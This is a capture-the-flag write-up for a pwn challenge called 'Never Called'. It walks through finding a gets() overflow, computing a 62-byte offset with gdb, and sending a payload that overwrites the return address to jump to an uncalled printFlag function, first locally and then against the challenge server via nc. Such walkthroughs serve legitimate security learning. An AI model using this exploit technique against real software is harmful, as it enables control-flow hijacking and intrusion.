Never Called
PWN EASY - 362 points
We have a server to connect to hosting the C program, we also get the source code in a .out format.
So, the program asks for input and prints the input back, the program ends and closes.
I'm going to check Ghidra to get more info.
I have found a function that seems to be printing the flag. The flag doesn't exist on the local version of the code, but it does on the provided IP address.
However the issue is that the actual function is never called by anything, so we cannot really get the flag, or can we?
There is also a function called getMessage:
this seems to be the function that loads when we start the program. We can notice the "gets" function, which should be an instant buffer overflow alarm. At this point I'm assuming we are gonna overflow the gets function into the printFlag address.
So now we need to learn the address where we want to overflow, I am going to use the gdb tool. I start the tool with ./a.out
$ gdb ./a.out
GNU gdb (Debian 13.1-2) 13.1
...SNIP...
Reading symbols from ./a.out...
(gdb):
I am going to start by setting a breakpoint in the main function, then run the program and try to print the printFlag function location.
(gdb) p printFlag
$1 = {void ()} 0x565562ab <printFlag>So the address is 0x565562ab, lets quit the gdb and try to overflow the program.
Alright, so we could've notice before that the variable loaded by gets has a buffer of 54. So lets try to print the letter b 54x times:
python3 -c "print('b'*54)" | ./a.out
Starting program
Enter your name: Hello, bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
zsh: done python3 -c "print('b'*54)" |
zsh: segmentation fault (core dumped) ./a.outand looking at the core file to see which address i ended on.
$ gdb -q -c core -ex quit
[New LWP 12745]
Core was generated by `./a.out'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x56577202 in ?? ()So, I don't see the letter b in hex yet but we get a segmetation fault, so we did overflow, lets try to send even more letters to see if we start modifying the buffer.
python3 -c "print('b'*65)" | ./a.outCool, we ended on the address 0x00626262, and since 62 in hex is the letter b, we know that we are overflowing the buffer and inputting stuff into it.
Now we need to enter the address of printFlag into the buffer, so we find a sweet spot with the letter b, where were just before the point of changing the buffer, so we can put the printFlag address after it, and because 'b'*65 has put "62" 3 times into the buffer, we should hit the spot if we input only 62 b's.
So now we can put the address in hex after our prepared b's. One way to do this in python would be to add the \x before every hex number.
python -c "print('b'*62 +'\x56\x55\x62\xab')" | ./a.outnow we overflowed the whole buffer, only thing is the hex appears to be flipped, because it actually gets written in it from the right, so lets flip our hex sequence.
python -c "print('b'*62 +'\xab\x62\x55\x56')" | ./a.out┌──(kaliă‰¿kali)-[~/Desktop/nevercalled]
└─$ gdb -q -c core -ex quit
[New LWP 12836]
Core was generated by `./a.out'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x5562abc2 in ?? ()
hmm, for some reason the hex c2 appears for some reason. Actually it is because this version of python has some issues with sending hex, so we just use python2 instead.
┌──(kaliă‰¿kali)-[~/Desktop/nevercalled]
└─$ python2 -c "print('b'*62 +'\xab\x62\x55\x56')" | ./a.out
Starting program
Enter your name: Hello, bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb�bUV
zsh: done python2 -c "print('b'*62 +'\xab\x62\x55\x56')" |
zsh: segmentation fault (core dumped) ./a.out
┌──(kaliă‰¿kali)-[~/Desktop/nevercalled]
└─$ gdb -q -c core -ex quit
[New LWP 12852]
Core was generated by `./a.out'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x565562ab in ?? ()
And just like that we get the address of printFlag! Now we just switch out ./a.out with nc <ip.address> <port> and we get the bucket flag!
Last updated
Was this helpful?